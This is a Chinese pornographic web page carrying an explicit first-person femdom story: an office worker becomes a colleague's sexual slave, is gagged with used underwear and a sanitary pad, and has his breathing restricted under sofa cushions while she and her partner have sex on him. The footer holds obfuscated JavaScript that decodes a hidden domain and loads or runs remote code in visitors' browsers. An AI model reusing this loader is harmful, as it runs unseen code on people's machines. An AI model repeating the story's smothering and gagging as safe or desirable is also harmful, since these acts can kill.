返回

我的经历夫妻主9e0

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com


研究生毕业以后,我如愿以偿的进入了一家规模很大的美国公司。职位虽然不高,但是好歹算个不错的起点。第一天进入办公室,看着周围忙忙碌碌的众白领们,心情激动,溢于言表-20年的学生生涯总算修成了正果。这里的的一切都和我之前想象的一样,经理给了我一堆资料就出去开会了。翻了几本,觉得没什么新鲜的,无聊之余便开始放眼四周寻找美女。我的目光在一个靓丽的背影上停顿了一会。灰色的名牌职业女装紧凑的裹露出完美的线条,凸凹有质。最要命的是一双黑色的高跟皮鞋,在我眼睛里一晃一晃,让我咽了口水后浮想联翩。不过我没有盯着她看看太久,因为在公司里要给同事留一个好的印象,第一天怎么也得装成个绅士做做样子,其次以我的经验,有这么好的背影和身材的女人80%都长的不堪入目。果然当她转身出门去洗手间的时候,我发现她长的果然和张柏芝相去甚远。不过样貌也还算姣好,眼睛很大,很有神,五官端正,一张瓜子脸,美中不足就是颧骨稍高,显得岁数偏大,其它的地方再挑不出毛病了。皮肤很白,而且有颗美人痣。后来知道这女孩叫LISA,财务部的经理。

一切都很正常,上班下班,偶尔加班赶份报告,和同事相处的很融洽,老板也没有横眉冷对,步入社会的头一个月就这么过去了。我自己也慢慢的融入了新的角色。和LISA一句话都没有说过,也不是故意回避,因为业务上没有联系,座位也离的较远,但我总会偷偷的斜眼去瞄她的一双美腿和高跟。LISA总是穿皮鞋或者皮靴。跟儿不高不低,但是可能因为脚型不错,身材高挑,她总能让我有一种想爬过去舔的冲动。可是就像我所有一切伴随我成长的SM幻想一样,这一次我当然也会把它深藏在心里,最多在手淫的时候想想罢了。一天下班我像平时一样走到地铁站台上,心里想着一会去那家台湾快餐店是吃牛腩饭还是鸡球饭。突然一个熟悉的身影映入眼帘,LISA就站在前面,目光看着我,好像在努力的回想着我的名字,但她的嘴角上翘,一副标准的办公室寒暄用的笑容。可能是手淫的时候想法太龌龊,冷一看她对我笑,手里顿时就出了一层汗。可是我还是故作惊讶的走了过去,很自然的笑着说:“Lisa你也坐地铁啊,以前没见过你呢怎么?”
“啊,我不常座的,今天有个聚会,正好是这个方向。你家在哪啊?”“我住南礼士路啊,呵呵,每天早上挤地铁可要命了!”,“哈哈,挤点不用在路上堵着多好啊!”两个回合下来,气氛很轻松舒服,我对自己的人际交往能力非常满意。上车以后,人多的把我俩挤在了一起,我尽量为她撑开一个空间,有一句没一句的聊着公司里的闲话。LISA身上的香水很好闻,在空气污浊的车厢里就像一抹甘泉,让我精神舒畅。让我惊奇的是她的声音非常好听,又软又温柔,我一边听她讲话,一边设计着晚上的手淫内容。好几次差点硬了,好在我及时控制,否则单衣单裤的挤在一起,那可是糗大了。几站地铁很快就到,LISA走了。我一路上都在想着她,怎么想怎么好。第二天到公司后,我装模做样的过去搭了几句话,把她的MSN要了过来。在公司交换MSN是很正常的事情,有时工作需要也可
以互相传递文件资料。以后的几天我们工作之余开始了闲聊,话题很广,我动用全部脑细胞引经据典,把话说的尽可能的风趣幽默。每次斜眼看去她的打字时笑的肩膀微微耸动,我都觉得非常成功。渐渐的,我把她当成了目标,开始进行追求行动。令我万分兴奋的是第一次约她出去,就亮了绿灯。当天晚上的晚餐我们在一家韩国餐馆,非常愉快。晚上我很绅士的送她回家,下车以后,我适时的挽了她的腰过了马路,微笑着说再见,转身回家。一切都太顺利了,我沾沾自喜,回家路上我的思绪已经飞到了压她在身下的那一刻。

从那以后我们开始约会,不是太频繁但每个星期都会有一两次,我和LISA的关系发展的很好,牵手,拥抱,接吻。直到一个周末我们回到了我的家里,在我们第一次尝试做爱的时候,我由于长期的手淫和幻想,没到两分钟就射了。LISA虽然表面没有任何异常,还是和平时一样的微笑说没关系,但是我能感觉到她的失望。这让我非常自卑。我们在床上躺着聊天,扯动扯西,我在暗自使劲想尽快雄风再起,可是不知道为什么就是硬不起来。过了有一个小时,LISA柔身过来开始亲热,在激烈的亲吻以后她一下伸手抓住了我的小弟弟,确发现我还是又软又小的。已经兴起的她一边吻我一边问:想不想要我?想不想要我?当时我的感觉糟透了,手忙脚乱的想对策。在饥不择食的状况下,我对她说我怕会有天失去她。果然这个严肃的话题让LISA清醒了过来,她很严肃的对我说:“我们现在这样并不代表什么,你千万多想,大家相处的很愉快是最重要的。”我的天,这不是我在以前泡妞时对我泡的妞说的台词吗。表面上我当然还装的很洒脱,但这一天结束的很尴尬。

以后的日子,由于自卑心里的作祟加上得不到的心痒,我对LISA加强了攻势。
频繁的约她出去,可是越是这样,得到同意的时候就越少。及时出去的时候,我的一些亲昵的要求也总是被拒绝。我不甘心,情人节,圣诞节,买贵重的礼物,鲜花,预订温泉旅店。可是LISA开始不接我的电话,有一天我打了20多个,后来
的回答是忘记带手机。我开始明显的感觉到了她在骗我。可是一种不甘心和天生受虐的下贱支撑着我还是屁颠屁颠的堆笑在每次艰难的见面时刻。又是一天,我绞尽脑汁的把她带回家,上了床,由于强烈的不自信,我并没有干她,而是为她进行了口交。LISA的反映十分激烈,在我的口舌伺候下蜜水狂流,当然这都被我喝到了嘴里。在她来了几次高潮以后,我从她的腿间爬了上来,问她感觉怎么样,她笑着说,这样简直太舒服了,她是第一次这样被人亲,还问我是不是总亲别人啊。我当然没有实话是说:我最新欢这么伺候女人。我告诉她可能比较有天赋吧,她对我笑道:你这个天赋可得好好培养,千万别浪费了。我当时就说:只要需要,我随时待命。LISA笑了起来,说道:太好了,说道做到啊!我心里别提多高兴了,
一努嘴凑过去要亲她的嘴唇。LISA皎洁的笑着把我的头用手挡住,说道:岗位职责还不明确吗?随后用力又把我按向了两腿之间……当时一种强烈的被虐的快感充斥了我的全身,阴茎剧烈的充血,膨胀,感觉天旋地转,一种屈辱同时又兴奋的感觉让我忘记了时间,忘记了一切。

当天晚上的饭桌上,我问LISA:以后我们算什么啊?她笑了笑,说:你是我的小奴隶,呵呵呵。我的弟弟在一瞬间再次勃起,脸上还装出一副震惊的样子,说:啊?我是你男朋友啊!“别胡说,我什么时候说过做你的女朋友了?不是早就说过让你别瞎想吗?怎么回事儿啊你?你要不想好好相处我们就别跟这儿费劲了!”我当时被吓了一跳,唯唯诺诺的说:好好好,别激动,我不是开个玩笑吗?LISA一副发怒的样子,柳眉直立,皱着眉头严厉的说:别乱开玩笑!正好趁这个机会我和你说,以后别老烦我,一边一边的打电话,我有我的生活,我给你时间有限,你天天想什么呢?以后我不找你不准找我听到没??这一翻话让我感觉五雷轰顶,绝望,委屈,愤怒交织在一起,可不知道为什么,我的小弟弟一直高高的挺着。最后我苦笑到,这样我算什么呢?真恨不得当你的一条小狗,最起码还能天天见到你呢……LISA听了以后哈哈笑道:你比狗地位高啊,狗舌头没有你
那么好使啊,呵呵。我和你说Peter,我有男朋友,虽然关系还没确定,但是我
觉得他太老了,虽然有钱但是没什么劲。你的出现让我想到自己可能更适合年轻一点的人。但是我觉得你也不适合我托付终身,明白吗,男人在该硬的时候要硬的起来,呵呵呵,明白吗?我觉得你骨子里就发贱!如果你觉得不合适,我们以后别再约会了,当作什么都没发生,我在办公室会给你留面子的。否则以后我让你干什么你就干什么,别那么多废话。说过以后,LISA丢下一脸木然的我,绝尘而去。当天晚上我手淫到虚脱。

从此以后我成了LISA的性奴,每天求着见她。而她只在有心情的时候叫我去她家里用舌头伺候她,而且从来不管我的感受,开始的时候还在卧室里,后来逐渐就在沙发上或者各种她喜欢的位置。她会劈开双腿,而我就像狗一样爬在她的两腿之间。她会放荡的叫,完全不会考虑我的感受,也不会特意去洗澡。我经常卖力的舔食着她满是臊气和白带的阴户,有的时候还能闻到避孕套的那种难闻的橡胶的味道……而到现在我已经完全投入了角色,放弃了自尊。和她在一起的时候我没有任何地位,跑前跑后,惟命是从。开始的时候去LISA家里,她还会象征的招待一下,到后来几本上就是直奔主题,结束以后直接被赶走回家自己手淫。
这种浑浑噩噩的生活持续了一段时间,这天我又一次来到这个熟悉的现代化小区,按响门铃后,我跪在了门口。这是我惯用的会见模式,是我自愿的,LISA第一次看到愣了一下,轻蔑的笑了笑拽着我的领带进了屋子。到现在她已经看都不看,开了门转身就走,而我就会像狗一样爬在她的屁股后面跟着。爬到她身前,我会低头吻她的脚趾,脚背,然后顺着腿向上,最后埋头在她的腿间,而LISA也很享受的看着我,居高临下,有时会让我把衣服脱光,用领带系在我的小弟弟上,像牵狗一样拽着我走来走去,淫乱的笑着,嘴里还说着各种让我血脉喷张的侮辱性的言语。今天进去以后发现她心情低落,于是我很知趣的跪在沙发旁边等着被使用。LISA坐在沙发上频繁的换着频道,突然一把抓住我的头发把我的嘴按到了她的睡衣里面。

我发现她已经脱了内裤,阴毛上潮潮的,阴户上也是一片狼藉。一股刺鼻的味道直冲我的大脑,这是男人精液的味道!我浑身发抖,嘴上却在不停的舔着,吸着。一会功夫,她进入了高潮,大量的汁液留了出来,其中夹杂着好多的精液,留进了我的嘴里。我的脸上沾满了她的水和她老男友的精液,前所未有的屈辱和兴奋让我接近休克。在那一刻我感觉世界已经不复存在,而我最大的愿望就是永远被固定在她的两腿之间。突然LISA的电话响了,我按着她的规定跪在了一边,头碰着地,试图去亲她的套在脱鞋里的脚趾在我侧脸的时候,LISA飞快的抬起了左脚把我踩在了地板上,随手接起了电话:“喂,啊,怎么回事啊你,又舍得打电话了?不是说必须得走吗?什么?别介啊,您工作多重要啊,我算什么啊?”“得了吧你,就知道说好听的。我?没干什么,玩呢?玩狗。”我在LISA的脚下感觉无地自容,小弟弟剧烈的充血,听到她继续说到“邻居的狗,回来没带钥匙去拿了,狗放我家一会,呵呵,唉你回来不,等着你呢!好,一会见!”电话挂了,LISA用脚抬起我的脸,笑着对我说:“怎么样,做我的狗荣幸不荣幸?来,叫一个听听,哈哈哈”当时的我已经是头脑一片空白,完全没有任何思考的能力,但是凭经验我知道她的心情已经变好,为了讨好她,我这辈子第一次学了声狗叫。
Lisa愣了几秒钟,哈哈大笑,一边笑,一边用脱鞋打着我的脸,说:“哎呀你真是没救儿了,你怎么就这么贱呢?你妈生你真是倒霉啊,以后别上班了,像你这贱种和我一个公司简直是对我的侮辱!我说你真愿意做狗?”“愿意,你让我干什么我都愿意!”Lisa笑的直不起腰来了:“我说你是图什么啊到底?”
“我就喜欢被你玩,伺候你,你越羞辱我越兴奋!”

我说出了一直压在我心里的,做为一个SM爱好者长久压在心里的话,“求求你让我一直伺候你吧!”好,呵呵呵,行,真没见过你这样的呢,呵呵,我老公一会回来了,怎么着啊你想见见爸爸不?“这句话让我五雷轰顶,呆若木鸡,见爸爸?LISA看到我的傻样,一个嘴巴抽了过来,”傻了吧你!你不是愿意被侮
辱吗?我今天成全你。“她站起来,把我拽开,”我想想,把沙反垫子拿起来!“我很听话的把很大很厚的两个沙发垫子拿下来,放在地上,心里觉得很奇怪,不知道她要干什么。

“把衣服都脱光,狗还能穿衣服吗?脱了以后躺上去!”我用最快的速度躺到了没有沙发垫子的沙发上。LISA家的沙发非常大,很软,垫子特别厚,下面也是软的,我躺上去以后直接就陷了下去,身体并没有高处沙发的平面。LISA穿着睡衣走到厨房拿了卷胶带进来,把我的手捆到背后,脚也捆了起来。这一顿忙活后她的脸上泛红,微微发亮,看的我眼睛都直了。Lisa站着想了想,从柜子里翻了一条脏内裤出来,笑着走过来,一下塞到了我的嘴里,塞完以后发现塞不住。
弹了我一个头蹦儿说到:狗嘴还停大!转身出去一会进来手里拿了一卷东西,我一看是个用过的卷起来的卫生巾。LISA用内控把卫生巾包起来,一起用力塞到了我的嘴里。这次太大,塞的很费劲,最后她站到沙发上用脚踩了半天才踩进去,而我的嘴已经快被撑破了。LISA用胶带把我的嘴也封住以后说:“怎么样,妈妈对你好不,让你享受享受,呵呵,待会不管怎么样都不许出声听见没,否则我直接把你从马桶里冲下去!”我能做的就知能是玩命的点头。LISA笑着把两个沙发垫子又放在了我身上,复原了沙发。随后我感觉她一下子做到了沙发上,还故意使劲往下坐了两下,隔着厚厚的垫子我隐约她到她在笑着说:挺好,感觉不出来!而她坐的位置正好在我的胸口上这两下差点要了我的命。而小弟弟却玩命的挺,在狭小的空间里顶着垫子,感觉随时都会射出去。

这个时候门铃响了,我感觉身上重量猛的一轻,紧跟着清脆的脚步声传向了门口……沙反里面那种新家具特有的皮革味道充斥着我的鼻腔,眼前一片漆黑。由于被紧紧的压住,我能感觉到脖子上的动脉在一跳一跳。嘴被撑的满满的,舌头在慢慢失去直觉,耳朵里传来的是自己越发沉重的呼吸声。所有这些前所未有的感观刺激让我处于一种极度亢奋的状态之下:屈辱,恐惧,兴奋。

突然间一个男人的声音击中了我本来已经渐渐失去作用的耳鼓。“怎么这么慢,干什么呢?穿个睡衣跑来跑去的,都几点了?”这一瞬间我能感觉到我自己的瞳孔突然放大,极度的恐惧充斥着每一个毛孔。我的SM世界里第一次出现了男性!在那一刻我的心跳第一次有了同时加速和减速的体验。从小学时第一次幻想着去舔班主任的脚,到长大后付钱出去找女王调教,所有的一切幻想都围绕着女主,这是一个只属于我和女王的世界,从来没有另外的一种角色的介入。可是为什么这种极度的畏惧突然间让我有一种前所未有的紧张和期盼?就好像马上就要接触到了一个全新的境界,而自己却偏偏对等待着自己的未来一无所知,对自己的命运完全无法掌控,这种感觉一下子让我全身颤抖,我已经可以用耳朵听到自己的心脏在拼命的狂跳,每一次从肺里呼出气体都会带动一阵全身的痉挛。
“等着你呢呗,废什么话呀,快过来,抱抱!”LISA的声音隔着沙发垫子
透了过来,两个人已经走到了沙发边上。“哟哟哟,今天怎么这么乖啊,来我抱抱!喝!这小屁股!”这个带着点南方口音的中年男人的每一个字都清清楚楚的传到了我已经嗡嗡作响的大脑中。这个每天占有我心爱女人的男人,就现在离我近在咫尺。我似乎预感到了即将发生的事情,似乎一下子明白了LISA所谓的成全我的意思,似乎再一次尝到了男人精液的味道……这个老男人的精液!――这个念头像闪电一样划过我的脑海!屈辱的感觉已经到了极限,我感觉眼泪在眼眶里打转,喉咙里不能控制的在发出咕噜咕噜的声音。

为什么要这样??在那一刻我想到了20多年的读书生活,想到了远在老家的父母,想到了公司里一起喝酒打球的同事,仿佛一个将死的人在临死的瞬间在飞速的回忆着他的一生。我感觉我在那一刻完全告别了正常人的生活,我完成了最彻底的转变。脱胎换骨。

恐惧一下子变成了无法言喻的渴望,我的呼吸已经急促到分不清进气和出气,虽然一片漆黑可是眼睛却睁的快要裂开。“讨厌你!哎呀,呜……”LISA的嘴
被封住了,话声止住,随之而来的是两个人身体接触和互相摸索的声音。我可以想象到这个男人的手在LISA的身上游走,我可以听到她发出的愉快,并略带夸张的呻吟。这时我体内所有的能量都集中到了身子正面和沙发接触的神经末梢,拼命的试图去感受那些强烈渴望的压力变化。啪的一生倾向,一件东西落在了我腿上的位置,我猜想是男人的上衣。

我像在电椅上被突然加大了电压,阴茎已经涨到发痛,疯狂的跳动着,喉咙发甜,脑子里在声嘶力竭的喊着:在我身上做爱!!在我的脸上做爱!!!坐在我的脸上操我爱的女人!!!!操!!!!!!!操我!!!!!!!!!!!!!!

突然之间一个巨大的重量一下子落到了我的肚子上,这种冲击让本来已经要崩溃的我一泻千里老男人终于坐了下来,“唉,这沙发怎么回事……”“有我在还管沙发??”LISA马上打断了他。随之而来的是身上重量的加剧-LISA坐在
了那男人的腿上,宽衣解带的声音传了过来,两个人的喘气声都很粗,LISA大概是觉得非常的刺激,身体不停的扭动着,而她的每一个动作都隔着沙发垫子传到了我的身上。“啊……怎么这么有兴致啊宝贝儿,这么想老公啊?”那男人喘着粗气,“嗯,想要你!唔……啊……轻点!唉呦,这么大了!”“呵呵,小宝宝怕啦?嗯……来我看看湿了没有……”由于他们两个人的位置正好在我的肚子上,几分钟后我再次勃起了。

“插进来,快快,我要!……啊!!,等等,坐过来点!靠这边”还没等下面的我反映过来,肚子上一轻,脸却一下子被巨大的重量压住了。LISA故意把做爱的位置挪到了我的脸上!!我在毫发之间下意识的扭了一下脸,侧过了头,否则这条小命估计就搭在这了。可就算这样,我还是被压的非常辛苦,两个人的重量虽然中间有层厚厚的海绵垫子,把我压的非常难过。嘴撅了起来,像猪一样已经碰到了鼻子,呼吸变的非常困难,可强烈的刺激和兴奋让这一切都不再重要。两个人很快开始了抽插,耳朵里传来了LISA那熟悉的呻吟声,“啊……啊……嗯……嗯……噢噢……啊!”中间夹杂着男人粗重的喘息,而我的头也被一下一下的砸着,压着。我感觉我的生命,我存在的意义都在一下一下的被砸进地底,我的人格,我的尊严,我的一切都在被人以最羞辱,最恶劣的方式践踏着。

随着一阵阵的抽送,俩个人渐渐进入了状态,LISA的呻吟越来越大,她显然非常的舒服,不住的喊:“快快,插插……老公快插插我……啊啊啊……!!”那男人大概也受到了刺激,越发努力起来,他的喘息声越来越大,“这样吗,喜欢这样被我插吗,这样,这样,这样,这样?被老公插的舒服吗?!”“舒服,啊,啊啊,老公好大……老公的鸡巴好大,插的我舒服,啊啊啊啊……啊!”两人的动作越来越剧烈,我在上面一侧的脸已经被沙反垫子摩擦和挤压到麻木的没了感觉。而且因为我必须要在男人向上顶的一瞬间吸气,所以呼吸的节奏已经完全和他们抽插的频率同步了。我觉得自己已经完全沦为了他们性爱的一部分,我的脸擎着那个老男人的屁股,我爱的女人骑在他的鸡巴上。我存在的意义和避孕套一样,就是为了两个人的快感。

这一想法让我浑身沸腾,强烈的自卑和屈辱让我再次濒临高潮的边缘。突然间我听到LISA说“啊……啊……快,换下,我在下面……”两个人很快换了位置,
我脸上的重量消失了几秒钟后,重新增加,不过这次要轻的多。LISA在我的脸上!
我的内心兴奋的喊了出来,随之而来的是由沙发侧面传来的撞击,这次的频率比以前更快,更猛烈。我想象了一下,LISA应该正坐在了沙发上,而男人应该是
跪在了地上从正面的插入。

LISA的叫声越来越大:“啊啊啊啊啊,好舒服啊老公……啊啊啊插……我要要,我要来,快使劲插插!”可是老男人好像到此时才开始发挥实力,这显然是他喜欢的一个体位。撞击的频率时快时慢,还不时的左右晃动。“啊啊啊啊啊啊啊!来了,老公,我要来了……啊!啊啊啊啊”LISA高潮了,她的喊声就像是
给我的命令一样,我在那一刻又一次狂泻而出,肢体痉挛。

可是老男人并没有停止,他还在猛烈的抽送,LISA的叫声在停了几秒钟后再次响起:“啊……啊……老公好棒……老公再插,我还要要要……啊……啊……呀。啊……嗯……啊……!两个人从开始到现在已经超过了半个小时失,那个男人的性能力让我产生了强烈的自卑,怪不得LISA不把我当做男人,我怎么配算做是个男人?而这种自卑马上转化成了屈辱的兴奋。LISA和这个老男人在我上面更换了几次体位,可能由于在我之前那个男人射过一次,这一次他足足干了有将近一个小时多才终于射了,而LISA至少来了三四次。他射的时间非常长,大声的呻吟着,喘着气。在那一刻我突然希望他是射在我的脸上的。

电视机响了,我感觉两个人互相搂着坐在我的身上,互相说着什么,由于他们太累,加上电视的声音较大,我听不清他们的对话。隐隐约约我听到LISA在要纸巾擦拭,还有两个人满足的笑声。

大概半个小时左右,当我的胸口和脸上已经被压的没有感觉了以后,男人的电话响了。“噢,张总,啊,对我在家呢。对,刚才我过去看了没什么事情就回来了。对对,噢这样啊,那我再去一下吧。好的,没关系没关系,休息完了。哈哈哈,好,一会见。”“又走!”LISA明显不高兴了,“老总安排的,你也听
到了,没办法,我去看看就回来啊,公司来了一帮做审计的,我得盯着点,这事你懂。晚上我们去吃火锅,听话。”“公司比我重要啊,折腾完了就走。那你打电话定位置,晚上去吃海地捞。”“好好,我打。很快的,已经5点半了,我六点半来接你。”老男人起身开始穿衣服,LISA一直坐在“沙发”上,老男人走进厕所,接着是马桶的冲水声,开门,出门,关门的声音。我的心在这个过程中一直忐忑着,又充满了期盼。

LISA一下子站了起来,我的眼前突然一亮,这么长时间的黑暗让我的眼睛一时难以看清东西。隐约着我看到LISA低头在看着我笑,她头上的灯管好像一轮太阳让她的轮廓显的无比的神圣。“怎么样,感觉爽吗?”我拼命的点头,嘴里发出呜呜的声音,脸上估计满是泪水和鼻涕,这副狼狈相逗的LISA哈哈大笑!她一把撕掉了我嘴上的胶带,用力扣了半天把我嘴里的内裤和卫生巾扣掉,这些东西已经被我的口水浸透了。“滚出来!”LISA鄙夷的说了一句我由于手脚被捆,而且又基本失去了知觉,只能费力的拱着滚到了地上,像一只大虫子一样,艰难的跪了起来。LISA再次坐到沙发上,我抬头看上去,她还穿着睡衣,脸上和身上露出的地方还挂着一层汗水,脸上通红,连续的高潮使得女性荷尔蒙和激素剧烈分泌,让这个女人明艳照人。现在的我因为一直处于高度兴奋的状态,一看到LISA就觉得再也控制不住自己了,嘴长的大大的,却发不出声音。眼睛直勾勾的盯着LISA两腿之间,那是我想呆到死的地方!LISA笑着说:“着急了?来来,该你
了,帮我收拾收拾,把我老公玩完的地方舔干净……”

话还没说完,我已经疯狂的扑了上去,由于手在背后,我一冲之下失去了平衡,额头重重的磕在了地板上,发出咚的一生。“哈哈哈,磕头谢恩吗,来,妈妈帮你”LISA揪着我的脖子把我按在那块我熟悉的位置上。她的阴户已经一塌糊涂,阴唇外翻,由于充血泛着漂亮的红色,整个上面湿津津的,连阴毛上都沾着分不清是爱液,汗液还是精液的东西。而此时的我早已经没有了任何思想,我像疯了一样不顾一切的舔着,吸着,把所有的东西全都吃进肚子里。刚才所有压抑的能量在一瞬间迸发了出来。“哎呀,呵呵呵,慢点,轻点轻点,都是你的,没人抢,哈哈”LISA用力的按着我的头控制着节奏,就像操纵一个清扫机和吸尘
器一样控制我的嘴,我的头,我的身体,我的灵魂。我努力的把舌头伸到最长,每次接触LISA的身体,我都卖力的舔着,大脑里一片空白,除了控制性兴奋的区域在燃烧以外,所有的其它部分都失去了作用。小弟弟由于连续射精和兴奋已经勃起的发痛。我的鼻子不停的接触着LISA的阴毛,鼻子里充斥着一股浓浓的性爱的味道。LISA在这个时候也因为之前的满足而不在享受我的口舌侍奉,而是集中精力控制我舌头的游走来清洁她的阴部。

突然,当我舔的已经完全进入了忘我的境界的时候,LISA忽然一脚把我踢开,
接着抽了我个嘴巴,把我打的歪道在地。“往哪舔呢,你傻呀你!你真他妈是狗啊,还要吃屎吗?”我倒在地上,愣愣的看着剑眉直立的LISA,摸不着头脑。仔细回想了一下,刚才最后几下舌头上的感觉确实有些不通,好像舔到了一个以前没有碰到的地方,味道有些咸涩,还有点发苦。难道我舔到了LISA的屁眼??我的舌头碰到LISA排泄粪便的地方!这让我再一次进入了亢奋的状态,我挣扎着扭动身子跪了起来,嘴里含糊不清的说到:“只要是你的,我什么都吃,让我伺候你吧,求求你了!!”“滚!吗的,你个贱货!”LISA再一次把我踹翻在地。“去把嘴洗干净了再回来碰我!”LISA好像对我舔到了她的肛门非常的不高兴,
我猜想她可能是那里非常敏感,又或者不愿意让我接触那么肮脏的东西。我一边想着一边被她连踹带拽的揪到了厕所里。

灯亮了,映入我眼帘的是白色的马桶,我跪在了坐便器前面的脚垫上。鼻子已经接触到了马桶边缘冷冷的瓷砖。我可以看到坐垫被抬了起来,是那个老男人刚撒了尿!我甚至看到了在我鼻子前面的马桶边缘上有零星的黄色的尿液。强烈的屈辱让我浑身发抖,我努力扭过头去想去吻LISA的脚,“滚!”LISA一脚踢在
我的脸上,我一个趔趄倒在了厕所的地上,身体弓着正好从侧面围绕着坐便器,脑袋就在马桶下面的脚垫子上贴着,闻到的是一股马赛克混着84的味道。“你不是爱吃屎吗,以后你就在厕所呆着,贱货!我不让你动你不准动,听到没有!”我答应了一声,由于我脸冲着马桶,背对着LISA,我看不到她的表情。LISA走了
出去,一会又进来了,手里多了一根锻炼用的跳绳。我还以为她要抽我,身上一下子起了一身鸡皮疙瘩!我怕痛,特别怕。正当我要开口求饶的时候,我感觉我的背上被LISA一脚踩住,压在了马桶侧面。冰凉的瓷砖让我打了一个寒战。LISA
用跳绳把我捆在了马桶上!绳子从我的脖子后面绕着马桶下面最细的,贴近着地面的捆了一圈。她踩着我的背把我使劲的绑住,由于绳子困在我的脖子后面,我没有窒息的感觉,只是脸像楔子一样紧紧的插在了马桶根部和地面瓷砖的夹缝中。右眼在上,我的余光可以看到马桶最外侧的上沿,右耳朵紧贴着马桶向内向下的拱起的部分,里面应该就是始终存留的那写水的地方。

LISA看了看,觉得很满意,我听到她走过来,“啪”的一声,坐垫被放下来,
紧接着她坐了下来。我可以看到她从马桶边缘上伸出的两条腿。她的一只脚蹬在我的右耳上,另一只踩在我的肩膀上。一阵清脆的水声响了起来,由于我的耳朵贴在马桶上,这声音十分清晰。LISA在我的头上尿尿了!屈辱的兴奋让我下意识的扭动着身体,喉咙里发出了野兽一样的声音。“别动!老实点!”LISA话刚说完,伴随着她的脚后跟在我的后脑勺使劲踢了一下,我的颧骨重重的磕在了马桶上,一阵眩晕。

冲水声响起,我听到了撕扯厕纸的声音,心里强烈的盼望着她把用过的厕纸塞进我的嘴里!可惜这时候电话响了,LISA站起来,快步跑出去接了电话:“啊?
到点了吗?我?睡着了,那你等等我洗个澡啊……噢,那好回来再洗吧,等我一会我穿上衣服就下楼。好,好,拜拜”。天啊LISA要走,我怎么办?难道她要把我绑在这?今天晚上还要加班赶报告呢!我正想着,LISA走了进来,到我的背后蹲了下来,我侧着眼睛看到她在低头看着我,只不过脸被马桶遮住了一半。“你在这带着等我回来,晚上还有事要和你说,好好想想你到底愿意不愿意做我的狗!”“可是我……唔”我的话还没说完,突然嘴里又被塞住了,鼻子里传来了一阵略微有点发霉的味道,不知道她把一块抹布还是擦脚布连同好多纸巾一起塞到了我的嘴里,那些纸巾应该是刚才他们做爱以后擦拭下身用过的。一下子我什么都说不出来了。LISA转过来用脚尖使劲的把抹布塞死,转身关了灯,走了出去。厕所门也被关上,一片漆黑。

那一刻我突然有一种莫名的幸福,我知道她肯定还会回来的,我今天一定还能见到她!我被捆在LISA马桶上,好兴奋。真想手淫啊……我这样想着,迷迷糊糊的听着LISA在外面穿衣穿鞋,咣的一生门响后,再没有了任何声音。
[本帖最后由shinyuu1988于编辑]

评分
相关推荐
3.0分

3.0分 我们夫妻的交友经历dc9

3.0分

3.0分 我和姐夫的通姦经历983

3.0分

3.0分 菏泽夫妻3P经历6fc

3.0分

3.0分 我的一次换妻经历f02

3.0分

3.0分 我们夫妻的心路历程341

3.0分

3.0分 我的SM经历47b

3.0分

3.0分 [我的真实献妻经历][完]bc9

3.0分

3.0分 我的良家经历5e4

3.0分

3.0分 我的大学经历d44

3.0分

3.0分 我的偷情经历fa2

3.0分

3.0分 我的真实经历705

3.0分

3.0分 我的家教经历7da

3.0分

3.0分 [我的偷情经历]c72

3.0分

3.0分 我的良家经历5e4

3.0分

3.0分 我的真实经历705

3.0分

3.0分 我的带团经历495


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};